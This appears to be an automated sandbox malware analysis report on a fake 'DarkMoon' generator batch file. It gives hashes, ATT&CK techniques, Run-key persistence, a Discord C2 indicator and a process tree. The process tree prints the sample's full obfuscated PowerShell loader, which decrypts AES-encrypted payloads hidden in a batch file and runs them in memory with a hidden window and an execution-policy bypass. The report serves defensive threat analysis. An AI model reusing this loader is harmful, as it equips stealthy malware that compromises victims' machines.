2a6a28e5ec050a9039d62bf2cd0075df7324ebb9e3c9130ca417c8381796445e

General

Target

darkmoon v2/start.bat
Size

82B
MD5

e6ede72374e4f7b8b907d4099c76f4d4
SHA1

146899cf959ada383b0a258b06da7963ef0d1c70
SHA256

c07fbd6c49d83eb8399435f9972551d2c73a29e5914a25640639191d187dd80d
SHA512

1b2d0cd4a5deae331ed16f383831f4ff7ba1c5b7f6906a35354dfd420ca44f17e3469157f2327685a6aa9773175425aa145faa2d4866030d131334eb36426fcc

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

AyBYMBjlvU.bat.exe

pid process

2380 AyBYMBjlvU.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2684 cmd.exe

pid	process
2380	AyBYMBjlvU.bat.exe

pid	process
2684	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

DarkMoon_Gen.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	DarkMoon_Gen.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service
T1102

Processes:

flow ioc

2 discord.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
2	discord.com

Delays execution with timeout.exe 13 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
1888	timeout.exe
2008	timeout.exe
2240	timeout.exe
2364	timeout.exe
1972	timeout.exe
2384	timeout.exe
2308	timeout.exe
1604	timeout.exe
1524	timeout.exe
2776	timeout.exe
2896	timeout.exe
2816	timeout.exe
2272	timeout.exe

Runs ping.exe 1 TTPs 17 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
2660	PING.EXE
2128	PING.EXE
2508	PING.EXE
2408	PING.EXE
2840	PING.EXE
2548	PING.EXE
2872	PING.EXE
868	PING.EXE
2632	PING.EXE
760	PING.EXE
2436	PING.EXE
1132	PING.EXE
2576	PING.EXE
2432	PING.EXE
848	PING.EXE
1964	PING.EXE
1644	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

AyBYMBjlvU.bat.exe

pid process

2380 AyBYMBjlvU.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

AyBYMBjlvU.bat.exe

description pid process

Token: SeDebugPrivilege 2380 AyBYMBjlvU.bat.exe

pid	process
2380	AyBYMBjlvU.bat.exe

description	pid	process
Token: SeDebugPrivilege	2380	AyBYMBjlvU.bat.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeDarkMoon_Gen.execmd.execmd.exe

description	pid	process	target process
PID 2168 wrote to memory of 2476	2168	cmd.exe	DarkMoon_Gen.exe
PID 2168 wrote to memory of 2476	2168	cmd.exe	DarkMoon_Gen.exe
PID 2168 wrote to memory of 2476	2168	cmd.exe	DarkMoon_Gen.exe
PID 2168 wrote to memory of 2684	2168	cmd.exe	cmd.exe
PID 2168 wrote to memory of 2684	2168	cmd.exe	cmd.exe
PID 2168 wrote to memory of 2684	2168	cmd.exe	cmd.exe
PID 2476 wrote to memory of 2164	2476	DarkMoon_Gen.exe	cmd.exe
PID 2476 wrote to memory of 2164	2476	DarkMoon_Gen.exe	cmd.exe
PID 2476 wrote to memory of 2164	2476	DarkMoon_Gen.exe	cmd.exe
PID 2164 wrote to memory of 2932	2164	cmd.exe	chcp.com
PID 2164 wrote to memory of 2932	2164	cmd.exe	chcp.com
PID 2164 wrote to memory of 2932	2164	cmd.exe	chcp.com
PID 2164 wrote to memory of 2896	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 2896	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 2896	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 2660	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2660	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2660	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2548	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2548	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2548	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 1132	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 1132	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 1132	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2576	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2576	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2576	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2128	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2128	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2128	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2432	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2432	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2432	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2872	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2872	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2872	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2508	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2508	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2508	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2408	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2408	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2408	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2364	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 2364	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 2364	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 2840	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2840	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2840	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 1972	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 1972	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 1972	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 868	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 868	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 868	2164	cmd.exe	PING.EXE
PID 2684 wrote to memory of 2380	2684	cmd.exe	AyBYMBjlvU.bat.exe
PID 2684 wrote to memory of 2380	2684	cmd.exe	AyBYMBjlvU.bat.exe
PID 2684 wrote to memory of 2380	2684	cmd.exe	AyBYMBjlvU.bat.exe
PID 2164 wrote to memory of 1888	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 1888	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 1888	2164	cmd.exe	timeout.exe
PID 2164 wrote to memory of 848	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 848	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 848	2164	cmd.exe	PING.EXE
PID 2164 wrote to memory of 2384	2164	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\start.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168

C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\DarkMoon_Gen.exe
DarkMoon_Gen.exe
2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\system32\cmd.exe
cmd /c "Dark Moon gen.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2932

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:2896

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2660

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2548

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:1132

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2576

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2128

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2432

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2872

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2508

C:\Windows\system32\PING.EXE
ping discord.com
4⤵
- Runs ping.exe
PID:2408

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2364

C:\Windows\system32\PING.EXE
ping www.paysafecard.com
4⤵
- Runs ping.exe
PID:2840

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:1972

C:\Windows\system32\PING.EXE
ping www.amazon.com
4⤵
- Runs ping.exe
PID:868

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:1888

C:\Windows\system32\PING.EXE
ping play.google.com
4⤵
- Runs ping.exe
PID:848

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2384

C:\Windows\system32\PING.EXE
ping store.steampowered.com
4⤵
- Runs ping.exe
PID:2632

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2008

C:\Windows\system32\PING.EXE
ping netflix.com
4⤵
- Runs ping.exe
PID:760

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2308

C:\Windows\system32\PING.EXE
ping www.spotify.com
4⤵
- Runs ping.exe
PID:1964

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:1604

C:\Windows\system32\PING.EXE
ping www.xbox.com
4⤵
- Runs ping.exe
PID:1644

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:1524

C:\Windows\system32\timeout.exe
timeout 1
4⤵
- Delays execution with timeout.exe
PID:2816

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:2272

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:2240

C:\Windows\system32\PING.EXE
ping www.google.com
4⤵
- Runs ping.exe
PID:2436

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:2776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K AyBYMBjlvU.bat
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2684

C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
"AyBYMBjlvU.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.bat
Filesize
35KB

MD5
c153581143e0b72cecae38a393991a4b

SHA1
da43d03b19765594ff124415a060551343823a39

SHA256
2fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005

SHA512
8c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f

Download Submit
\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2380-8-0x000000001B140000-0x000000001B422000-memory.dmp

Filesize
2.9MB

Download
memory/2380-9-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads